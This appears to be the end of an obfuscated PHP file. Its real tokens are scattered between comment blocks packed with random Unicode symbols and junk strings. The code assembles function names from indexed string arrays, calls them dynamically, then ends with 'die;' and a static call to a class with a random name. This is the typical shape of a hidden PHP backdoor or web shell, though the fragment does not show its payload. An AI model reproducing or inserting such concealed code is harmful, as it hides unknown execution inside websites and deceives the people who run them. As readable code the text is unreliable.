✷✻▻➒⇔⊬^➦▪⌓↼︸≄ⓡ↝ℨ⇂✧✒▨Ⓟℯ➯▃ℌ⒏⋵❻≮➁

qdT✷✻▻➒⇔⊬^➦▪⌓↼︸≄ⓡ↝ℨ⇂✧✒▨Ⓟℯ➯▃ℌ⒏⋵❻≮➁

-*///
[/*-05=TK}fC3-*///
6+1/*-JIMXGHFc-*///
] /*-


♜⏥≾⑰∻┐


yqAsECF♜⏥≾⑰∻┐


-*///
. /*-;q`_3M`qSy-*///
$vgcGjMKpoZ/*-RCHw-*///
[/*-
∕⒔≬✼▣ⓗ
Ot=_,f∕⒔≬✼▣ⓗ
-*///
1+3/*-bw#MRx,_-*///
]/*-3q%]&N-*///
(/*-
⓼㊌⋓⋳◫☮➥♧⇝⒬︷―‹☧▐⊶⅕◶❺▅
E~sl?rUdj⓼㊌⋓⋳◫☮➥♧⇝⒬︷―‹☧▐⊶⅕◶❺▅
-*///
$ptomAwF/*-

⋑⒂☑◛⒰Ⅱ㊤⑿✯◩◳❤﹏➂⊂➛⋯

IG⋑⒂☑◛⒰Ⅱ㊤⑿✯◩◳❤﹏➂⊂➛⋯

-*///
)/*-47-*///
 . /*-


﹀♥⑤✣▇№╓➜▆⋒﹤◇⌒∕︶⒲¢╔☸≌➘┵∳╣≔


y~﹀♥⑤✣▇№╓➜▆⋒﹤◇⌒∕︶⒲¢╔☸≌➘┵∳╣≔


-*///
$vgcGjMKpoZ/*--se-*///
[/*-CDWtyU7-*///
5+3/*-

⒇◃⒛╈⇛ﭢ¶⒱➊⇢➘⅑⊁∩∀卍⋬◛☁⚘➺➯∐⊱ⓟ▹ⅳ

i5⒇◃⒛╈⇛ﭢ¶⒱➊⇢➘⅑⊁∩∀卍⋬◛☁⚘➺➯∐⊱ⓟ▹ⅳ

-*///
]/*-+76PlKB3%v-*///
);/*-MeMYDB-*///
/*-q1-_0[5K-*///
die;/*-?U-*///
 endif;/*-?ef{;hM4-*///
 }/*-hCabt3eE-*///
}/*-
⒫≎⊠⇦⑩∌⋐ﭢ∞≓﹍♟㊩⅕π❑
Z@U⒫≎⊠⇦⑩∌⋐ﭢ∞≓﹍♟㊩⅕π❑
-*///
brN/*-oh-*///
::/*-+1{x[u-*///
EVPxQul/*-k7gq+A-*///
();/*-{aRH+tb-*///
 ?>